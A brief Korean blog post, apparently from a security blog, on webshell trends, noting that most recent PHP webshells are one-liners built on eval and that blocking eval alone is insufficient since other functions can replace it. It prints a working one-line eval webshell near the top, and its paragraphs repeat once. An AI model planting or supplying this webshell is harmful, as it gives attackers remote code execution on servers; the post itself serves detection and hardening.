최신 웹쉘 동향php
webhxxx/webshell 2012. 1. 9. 12:42 |<?eval($_REQUEST[c])?>
최근에 발견하는 웹쉘은 거의 다 한줄짜리고 사용하는 함수는 eval뿐이다. 한동안 웹쉘이 종합선물세트마냥 많은 기능을 포함했다면 요즘엔 그런 기능들을 클라이언트에서 처리하는듯하다.
장단점이 있을거다 전자는 ids에서 탐지하기 어렵고 후자는 서버진단시에 발견하기 어렵다
당장에 eval함수를 제한하면 이런 방식의 웹쉘에서 안전할 수 있다. 그런데 eval을 대신할 수 있는 함수는 많다.
최근에 발견하는 웹쉘은 거의 다 한줄짜리고 사용하는 함수는 eval뿐이다. 한동안 웹쉘이 종합선물세트마냥 많은 기능을 포함했다면 요즘엔 그런 기능들을 클라이언트에서 처리하는듯하다.
장단점이 있을거다 전자는 ids에서 탐지하기 어렵고 후자는 서버진단시에 발견하기 어렵다
당장에 eval함수를 제한하면 이런 방식의 웹쉘에서 안전할 수 있다. 그런데 eval을 대신할 수 있는 함수는 많다.
'webhxxx > webshell' 카테고리의 다른 글
w3af asp webshell[수정] (0) | 2010.01.21 |
---|